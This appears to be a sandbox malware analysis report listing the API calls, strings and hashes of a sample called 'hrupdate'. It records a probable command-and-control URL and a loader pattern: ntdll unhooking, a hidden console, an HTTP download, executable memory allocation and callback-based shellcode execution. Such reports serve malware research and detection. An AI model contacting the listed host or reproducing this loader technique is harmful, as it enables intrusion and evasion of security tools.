                                                                  • Part of subcall function 00B01CA0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,?,?,21DC2236,?,00000000), ref: 00B01DC4
                                                                • socket.WS2_32(00000002,00000001,00000006), ref: 00B02259
                                                                • inet_addr.WS2_32(00000000), ref: 00B02273
                                                                • gethostbyname.WS2_32(00000000), ref: 00B0227B
                                                                • inet_addr.WS2_32(00000000), ref: 00B02283
                                                                • gethostbyaddr.WS2_32(?,00000004,00000002), ref: 00B02296
                                                                • htons.WS2_32(00000050), ref: 00B022BB
                                                                • connect.WS2_32(00000000,?,00000010), ref: 00B022D2
                                                                • send.WS2_32(00000000,?,?,00000000), ref: 00B02414
                                                                • memset.VCRUNTIME140 ref: 00B02429
                                                                • recv.WS2_32(?,?,00000200,00000000), ref: 00B02445
                                                                • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000), ref: 00B02465
                                                                • memcpy.VCRUNTIME140(?,?,00000000), ref: 00B0247D
                                                                • memset.VCRUNTIME140 ref: 00B02495
                                                                • recv.WS2_32(?,?,00000200,00000000), ref: 00B024AC
                                                                • strstr.VCRUNTIME140 ref: 00B024C7
                                                                • strstr.VCRUNTIME140 ref: 00B024DA
                                                                • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 00B02508
                                                                • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,-00000004), ref: 00B02530
                                                                • closesocket.WS2_32(?), ref: 00B02563
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00B02595
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00B025D1
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00B02628
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2942621894.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                • Associated: 00000000.00000002.2942591861.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942653485.0000000000B04000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942691161.0000000000B06000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942715689.0000000000B07000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942715689.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_b00000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo_noreturn$inet_addrmemcpymemsetrecvstrstr$closesocketconnectgethostbyaddrgethostbynamehtonsreallocsendsocketstrncpy
                                                                • String ID: $$GET %s HTTP/1.0$Host: %s
                                                                • API String ID: 1879041676-1199678302
                                                                • Opcode ID: 237bf1f4030e2f9892e4d0222378a17ba824e6d40bef8d4ad545d724f3e75d59
                                                                • Instruction ID: 55a47e74199f3875b478589be89616e1ac32844896622a9e71a60bb70ee1e69a
                                                                • Opcode Fuzzy Hash: 237bf1f4030e2f9892e4d0222378a17ba824e6d40bef8d4ad545d724f3e75d59
                                                                • Instruction Fuzzy Hash: C7D1E4719002189FDB24CF64DC49BDDBBB6EFA5304F0442E8E509A7291DB329E99CF64

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 00B02DCF: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00B027F7,00000000,00000000,?,?,?,00000000), ref: 00B02DE4
                                                                • _Cnd_init.MSVCP140(?,00000000), ref: 00B0110F
                                                                • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 00B01123
                                                                • _Mtx_init.MSVCP140(?,00000001), ref: 00B01144
                                                                • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 00B01152
                                                                • _Mtx_lock.MSVCP140(?), ref: 00B01172
                                                                • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 00B01180
                                                                • _Thrd_start.MSVCP140(?,Function_00001090,00B04424), ref: 00B011AA
                                                                • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000001), ref: 00B011C3
                                                                • _Cnd_wait.MSVCP140(?,?), ref: 00B011D6
                                                                • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 00B011E4
                                                                • _Mtx_unlock.MSVCP140(?), ref: 00B01212
                                                                • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 00B01220
                                                                • _Mtx_destroy.MSVCP140(?), ref: 00B01228
                                                                • _Cnd_destroy.MSVCP140(?), ref: 00B01234
                                                                • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00B0124A
                                                                • ?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140(00000001), ref: 00B01270
                                                                • _Thrd_detach.MSVCP140(?,?), ref: 00B0127F
                                                                • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 00B0128D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2942621894.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                • Associated: 00000000.00000002.2942591861.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942653485.0000000000B04000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942691161.0000000000B06000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942715689.0000000000B07000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942715689.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_b00000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: Throw_$C_error@std@@$Cnd_destroyCnd_initCnd_waitCpp_error@std@@Mtx_destroyMtx_initMtx_lockMtx_unlockThrd_detachThrd_startmallocterminate
                                                                • String ID: @qv
                                                                • API String ID: 3376608752-332092656
                                                                • Opcode ID: ffa068ade5f07a5d49ad655867aa7194601478a0ad5f424701a42334c0fe8a43
                                                                • Instruction ID: 9bbdcb817f76c4f0ead8987afa7d79f7c12b0e6773647265827dc9383b9f19fb
                                                                • Opcode Fuzzy Hash: ffa068ade5f07a5d49ad655867aa7194601478a0ad5f424701a42334c0fe8a43
                                                                • Instruction Fuzzy Hash: 20615FB0D00248ABDF14DBA8DD497DEBFF4EF14304F144169E905B3291EB75AA58CBA1

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 00B01B30: GetCurrentProcess.KERNEL32 ref: 00B01B47
                                                                  • Part of subcall function 00B01B30: GetModuleHandleA.KERNEL32 ref: 00B01B62
                                                                  • Part of subcall function 00B01B30: K32GetModuleInformation.KERNEL32(00000000,00000000,?,0000000C), ref: 00B01B73
                                                                  • Part of subcall function 00B01B30: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B01B8F
                                                                  • Part of subcall function 00B01B30: CreateFileMappingW.KERNELBASE(00000000,00000000,01000002,00000000,00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B01BA6
                                                                  • Part of subcall function 00B01B30: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B01BB8
                                                                  • Part of subcall function 00B01B30: VirtualProtect.KERNEL32(?,?,00000040,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B01C2C
                                                                  • Part of subcall function 00B01B30: memcpy.VCRUNTIME140(?,?,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B01C43
                                                                  • Part of subcall function 00B01B30: VirtualProtect.KERNEL32(?,?,?,?), ref: 00B01C5C
                                                                  • Part of subcall function 00B01B30: CloseHandle.KERNEL32(?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B01C76
                                                                  • Part of subcall function 00B01B30: CloseHandle.KERNEL32(?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B01C7B
                                                                  • Part of subcall function 00B01B30: CloseHandle.KERNEL32(?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B01C80
                                                                  • Part of subcall function 00B01B30: FreeLibrary.KERNEL32(?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B01C85
                                                                • GetConsoleWindow.KERNEL32(00000000), ref: 00B02CCA
                                                                • ShowWindow.USER32(00000000), ref: 00B02CD1
                                                                • WSAStartup.WS2_32 ref: 00B02D32
                                                                  • Part of subcall function 00B02180: socket.WS2_32(00000002,00000001,00000006), ref: 00B02259
                                                                  • Part of subcall function 00B02180: inet_addr.WS2_32(00000000), ref: 00B02273
                                                                  • Part of subcall function 00B02180: gethostbyname.WS2_32(00000000), ref: 00B0227B
                                                                  • Part of subcall function 00B02180: htons.WS2_32(00000050), ref: 00B022BB
                                                                  • Part of subcall function 00B02180: connect.WS2_32(00000000,?,00000010), ref: 00B022D2
                                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00B02D60
                                                                • memcpy.VCRUNTIME140(00000000,00000000,?), ref: 00B02D6D
                                                                • CertEnumSystemStore.CRYPT32(00010000,00000000,00000000,?), ref: 00B02D83
                                                                • FlsAlloc.KERNEL32(?), ref: 00B02D8A
                                                                • FlsSetValue.KERNEL32(00000000,?), ref: 00B02D9E
                                                                • WSACleanup.WS2_32 ref: 00B02DA4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2942621894.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                • Associated: 00000000.00000002.2942591861.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942653485.0000000000B04000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942691161.0000000000B06000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942715689.0000000000B07000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942715689.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_b00000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: Handle$CloseFileVirtual$AllocCreateModuleProtectWindowmemcpy$CertCleanupConsoleCurrentEnumFreeInformationLibraryMappingProcessShowStartupStoreSystemValueViewconnectgethostbynamehtonsinet_addrsocket
                                                                • String ID: c:\windows\system32\kernel32.dll$c:\windows\system32\ntdll.dll$dummy$http://www.hrtraining.ro/trainingcheck_v5498$kernel32.dll$ntdll.dll
                                                                • API String ID: 3600704002-5958019
                                                                • Opcode ID: 156830dd0b07f45e2fa641555fc1113c466618b40116440836d94c7745065869
                                                                • Instruction ID: 8f0bacf5de34b16d423386d04b134c2a39cc47fbd91ebd638982829055d2c32a
                                                                • Opcode Fuzzy Hash: 156830dd0b07f45e2fa641555fc1113c466618b40116440836d94c7745065869
                                                                • Instruction Fuzzy Hash: F34152B08083C59AD331DB64DD097EABBF4FBB9304F00561DEA88631A2EF706184CB56

                                                                Control-flow Graph

                                                                APIs
                                                                • GetCurrentProcess.KERNEL32 ref: 00B01B47
                                                                • GetModuleHandleA.KERNEL32 ref: 00B01B62
                                                                • K32GetModuleInformation.KERNEL32(00000000,00000000,?,0000000C), ref: 00B01B73
                                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B01B8F
                                                                • CreateFileMappingW.KERNELBASE(00000000,00000000,01000002,00000000,00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B01BA6
                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B01BB8
                                                                • VirtualProtect.KERNEL32(?,?,00000040,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B01C2C
                                                                • memcpy.VCRUNTIME140(?,?,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B01C43
                                                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 00B01C5C
                                                                • CloseHandle.KERNEL32(?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B01C76
                                                                • CloseHandle.KERNEL32(?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B01C7B
                                                                • CloseHandle.KERNEL32(?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B01C80
                                                                • FreeLibrary.KERNEL32(?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B01C85
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2942621894.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                • Associated: 00000000.00000002.2942591861.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942653485.0000000000B04000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942691161.0000000000B06000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942715689.0000000000B07000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942715689.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_b00000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: Handle$CloseFile$CreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewmemcpy
                                                                • String ID: .text
                                                                • API String ID: 3896868005-2719751843
                                                                • Opcode ID: a3e610069ed1cc1327cd3e4481948e012175b35a853f895de0102b737033df99
                                                                • Instruction ID: 02ae1497ff20a1cedae57beebe4e73c52d710431ff8858cd4595b848cdda656b
                                                                • Opcode Fuzzy Hash: a3e610069ed1cc1327cd3e4481948e012175b35a853f895de0102b737033df99
                                                                • Instruction Fuzzy Hash: AE4190B2940204ABDB20CFA4DC85BAABFB9FF18700F104555F705B7291EB71A950CBA4

                                                                Control-flow Graph

                                                                APIs
                                                                • _Query_perf_frequency.MSVCP140 ref: 00B012F3
                                                                • _Query_perf_counter.MSVCP140 ref: 00B01305
                                                                • __alldvrm.LIBCMT ref: 00B01310
                                                                • _Query_perf_frequency.MSVCP140(?,00000000), ref: 00B01322
                                                                • _Query_perf_counter.MSVCP140(?,00000000), ref: 00B01330
                                                                • __alldvrm.LIBCMT ref: 00B01341
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B01399
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B013C0
                                                                • _Xtime_get_ticks.MSVCP140(00000000,?,00000000,00000000,00000000,00000000,3B9ACA00,00000000,00000000,?,?,00000000,?,00000000,3B9ACA00,00000000), ref: 00B013EA
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B0140C
                                                                • _Thrd_sleep.MSVCP140(00000000,00000000,?,3B9ACA00,00000000,00000000,?,00000064,00000000,?,00000000,00000000,00000000,00000000,3B9ACA00,00000000), ref: 00B01434
                                                                • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 00B0146D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2942621894.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                • Associated: 00000000.00000002.2942591861.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942653485.0000000000B04000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942691161.0000000000B06000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942715689.0000000000B07000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942715689.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_b00000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$Query_perf_counterQuery_perf_frequency__alldvrm$Thrd_sleepXbad_function_call@std@@Xtime_get_ticks
                                                                • String ID:
                                                                • API String ID: 1496849827-0
                                                                • Opcode ID: 6ee9a781c565826a07d9645ae27b52d2387546c891c52cfccc2551e97db9c029
                                                                • Instruction ID: 12a4b3e533ab22d87d0439574b4dca5eb8ede43b53a2f4b17f575055be1929ee
                                                                • Opcode Fuzzy Hash: 6ee9a781c565826a07d9645ae27b52d2387546c891c52cfccc2551e97db9c029
                                                                • Instruction Fuzzy Hash: 48515CB2908340AFD710DF688C45B2BBFF9EFC8754F154A5DF689A72A1D73199008B92

                                                                Control-flow Graph

                                                                APIs
                                                                • _memset.LIBCMT ref: 04FC60DF
                                                                • __snprintf.LIBCMT ref: 04FC6106
                                                                  • Part of subcall function 04FCD3F2: _memset.LIBCMT ref: 04FCD413
                                                                • __snprintf.LIBCMT ref: 04FC6182
                                                                • __snprintf.LIBCMT ref: 04FC6199
                                                                • HttpOpenRequestA.WININET(00000000,?,00000000,00000000,04FF656C,05009668), ref: 04FC61C8
                                                                • HttpSendRequestA.WININET(00000000,?,?,04FC62C1,?), ref: 04FC61F1
                                                                • InternetCloseHandle.WININET(00000000), ref: 04FC620E
                                                                  • Part of subcall function 04FC99C6: _memset.LIBCMT ref: 04FC99D6
                                                                  • Part of subcall function 04FC99C6: _memset.LIBCMT ref: 04FC99E2
                                                                  • Part of subcall function 04FC99C6: __snprintf.LIBCMT ref: 04FC9A33
                                                                  • Part of subcall function 04FC99C6: _memset.LIBCMT ref: 04FC9A6A
                                                                  • Part of subcall function 04FC99C6: _memset.LIBCMT ref: 04FC9A75
                                                                  • Part of subcall function 04FC9A90: _memset.LIBCMT ref: 04FC9AA0
                                                                  • Part of subcall function 04FC9A90: _memset.LIBCMT ref: 04FC9AAC
                                                                  • Part of subcall function 04FC9A90: __snprintf.LIBCMT ref: 04FC9B08
                                                                  • Part of subcall function 04FC9A90: _memset.LIBCMT ref: 04FC9B26
                                                                  • Part of subcall function 04FC9A90: _memset.LIBCMT ref: 04FC9B31
                                                                • InternetQueryDataAvailable.WININET(00000000,04FC383D,00000000,00000000), ref: 04FC621F
                                                                • InternetReadFile.WININET(00000000,?,00001000,?), ref: 04FC624D
                                                                • InternetCloseHandle.WININET(00000000), ref: 04FC626D
                                                                • InternetCloseHandle.WININET(00000000), ref: 04FC628E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _memset$Internet__snprintf$CloseHandle$HttpRequest$AvailableDataFileOpenQueryReadSend
                                                                • String ID:
                                                                • API String ID: 2172916581-0
                                                                • Opcode ID: 40e5e2bedabd578f53a482707598f6ce6131ed9bae6e962141338f684f271493
                                                                • Instruction ID: 24dd9080d454eebfc68367c3cfb1a6be6763d0ec59f1f06839ddb7ac193cbb7b
                                                                • Opcode Fuzzy Hash: 40e5e2bedabd578f53a482707598f6ce6131ed9bae6e962141338f684f271493
                                                                • Instruction Fuzzy Hash: 9E519BB2D0420ABFEF11AFA4ED84DEE7BBDEF04718F044469F514E3151DA35A9468B60

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 04FCBF5F: _malloc.LIBCMT ref: 04FCBF65
                                                                  • Part of subcall function 04FCBF5F: _malloc.LIBCMT ref: 04FCBF75
                                                                  • Part of subcall function 04FD0BB6: __time64.LIBCMT ref: 04FD0BC8
                                                                  • Part of subcall function 04FD0BB6: _malloc.LIBCMT ref: 04FD0C0F
                                                                  • Part of subcall function 04FD0BB6: _memset.LIBCMT ref: 04FD0C1C
                                                                  • Part of subcall function 04FD0BB6: _strtok.LIBCMT ref: 04FD0C36
                                                                  • Part of subcall function 04FC970C: __time64.LIBCMT ref: 04FC971D
                                                                  • Part of subcall function 04FD3B98: _malloc.LIBCMT ref: 04FD3BBF
                                                                  • Part of subcall function 04FD3B98: _memset.LIBCMT ref: 04FD3BED
                                                                  • Part of subcall function 04FD3B98: _realloc.LIBCMT ref: 04FD3BCE
                                                                • _malloc.LIBCMT ref: 04FC3661
                                                                • GetLocalTime.KERNEL32(?), ref: 04FC36BF
                                                                • GetLocalTime.KERNEL32(?), ref: 04FC3758
                                                                • __snprintf.LIBCMT ref: 04FC37AC
                                                                • __snprintf.LIBCMT ref: 04FC37BF
                                                                • __snprintf.LIBCMT ref: 04FC37E0
                                                                • __time64.LIBCMT ref: 04FC3884
                                                                • __time64.LIBCMT ref: 04FC3939
                                                                • GetLocalTime.KERNEL32(?), ref: 04FC3709
                                                                  • Part of subcall function 04FD2F47: Sleep.KERNEL32(000003E8,00000080,00000000,00000000,?,?,04FC39A6), ref: 04FD2FAE
                                                                  • Part of subcall function 04FD2F47: RtlExitUserThread.NTDLL(00000000,00000080,00000000,00000000,?,?,04FC39A6), ref: 04FD2FE7
                                                                  • Part of subcall function 04FD2F47: WaitForSingleObject.KERNEL32(00000000,?,?,04FC39A6), ref: 04FD3003
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _malloc$__time64$LocalTime__snprintf$_memset$ExitObjectSingleSleepThreadUserWait_realloc_strtok
                                                                • String ID:
                                                                • API String ID: 4021925118-0
                                                                • Opcode ID: 2a6053757d82f09bfc0108c82e6fd5de468b6f3fd153353462dda776b7188483
                                                                • Instruction ID: e7487141a1a985bcdd5abe58c8475f5e811d8290c38aa1b669745ad34188ae36
                                                                • Opcode Fuzzy Hash: 2a6053757d82f09bfc0108c82e6fd5de468b6f3fd153353462dda776b7188483
                                                                • Instruction Fuzzy Hash: 4BD10672D40316AAFF247FB0AE05B6E7BA6AF04358F18441DFD04AA1C0DE79F5438A65

                                                                Control-flow Graph

                                                                APIs
                                                                • GetACP.KERNEL32(00000080,00000000,00000000,?,?,?,?,?,?,?,?,04FC369C,00000000,00000000), ref: 04FCBE0C
                                                                • GetOEMCP.KERNEL32(?,?,?,?,?,?,?,?,04FC369C,00000000,00000000), ref: 04FCBE18
                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04FC369C,00000000), ref: 04FCBE45
                                                                • GetTickCount.KERNEL32 ref: 04FCBE49
                                                                  • Part of subcall function 04FDDFA9: __getptd.LIBCMT ref: 04FDDFAE
                                                                • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04FC369C,00000000), ref: 04FCBE76
                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,04FC369C,00000000), ref: 04FCBEDC
                                                                • _memset.LIBCMT ref: 04FCBF13
                                                                • _memset.LIBCMT ref: 04FCBF52
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: CurrentProcess$_memset$CountTick__getptd
                                                                • String ID:
                                                                • API String ID: 3908538216-0
                                                                • Opcode ID: 12e56e0691da8eb54208064541addb7a88c2afbb341588d1a3ed4a3b05f399f1
                                                                • Instruction ID: 14e0e80b43996d093842670950e7ffacc919c6332b67b2adac3d5d589eda139e
                                                                • Opcode Fuzzy Hash: 12e56e0691da8eb54208064541addb7a88c2afbb341588d1a3ed4a3b05f399f1
                                                                • Instruction Fuzzy Hash: 9A31D772800209BBFB107BB4FD49E9E3F69AF44268F14542AF904AB0C1DE78F9468661

                                                                Control-flow Graph

                                                                APIs
                                                                • GetDlgItem.USER32(?,000003E8), ref: 00B01A52
                                                                • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00B01A64
                                                                • KillTimer.USER32(?,00000001), ref: 00B01A72
                                                                • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 00B01A7B
                                                                • DialogBoxParamW.USER32(00000081,?,00B01B00,00000000), ref: 00B01A94
                                                                • SetTimer.USER32(?,00000001,000003E8,00000000), ref: 00B01ACE
                                                                • EndDialog.USER32(?,00000000), ref: 00B01AE4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2942621894.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                • Associated: 00000000.00000002.2942591861.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942653485.0000000000B04000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942691161.0000000000B06000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942715689.0000000000B07000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942715689.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_b00000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: DialogTimer$CallbackDispatcherItemKillMessageParamSendUser
                                                                • String ID:
                                                                • API String ID: 182125530-0

                                                                APIs
                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 00B0193E
                                                                • DefWindowProcW.USER32(?,00000111,?,?), ref: 00B01970
                                                                • BeginPaint.USER32(?,?), ref: 00B019D3
                                                                • EndPaint.USER32(?,?), ref: 00B019DF
                                                                • PostQuitMessage.USER32(00000000), ref: 00B019FB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2942621894.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                • Associated: 00000000.00000002.2942591861.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942653485.0000000000B04000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942691161.0000000000B06000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942715689.0000000000B07000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942715689.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_b00000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: PaintProcWindow$BeginMessagePostQuit
                                                                • String ID:
                                                                • API String ID: 3181456275-0

                                                                APIs
                                                                • _Mtx_lock.MSVCP140(?,21DC2236,?,?,?,?,00B03EB0,000000FF), ref: 00B02B3B
                                                                • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 00B02B4F
                                                                • _Cnd_signal.MSVCP140 ref: 00B02B5B
                                                                • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000,00000000), ref: 00B02B69
                                                                • _Mtx_unlock.MSVCP140(00000000,00000000), ref: 00B02B71
                                                                • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 00B02B7F
                                                                • _Cnd_do_broadcast_at_thread_exit.MSVCP140 ref: 00B02B8B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2942621894.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                • Associated: 00000000.00000002.2942591861.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942653485.0000000000B04000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942691161.0000000000B06000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942715689.0000000000B07000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942715689.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_b00000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: C_error@std@@Throw_$Cnd_do_broadcast_at_thread_exitCnd_signalMtx_lockMtx_unlock
                                                                • String ID:
                                                                • API String ID: 35399794-0

                                                                APIs
                                                                • _malloc.LIBCMT ref: 04FCCC5D
                                                                  • Part of subcall function 04FDDA1B: __FF_MSGBANNER.LIBCMT ref: 04FDDA3E
                                                                  • Part of subcall function 04FDDA1B: __NMSG_WRITE.LIBCMT ref: 04FDDA45
                                                                  • Part of subcall function 04FDDA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 04FDDA92
                                                                • htonl.WS2_32(6083960B), ref: 04FCCC89
                                                                • recvfrom.WS2_32(?,B0C25DAC,000FFFFC,00000000,?,?), ref: 04FCCCB8
                                                                • WSAGetLastError.WS2_32 ref: 04FCCCC3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
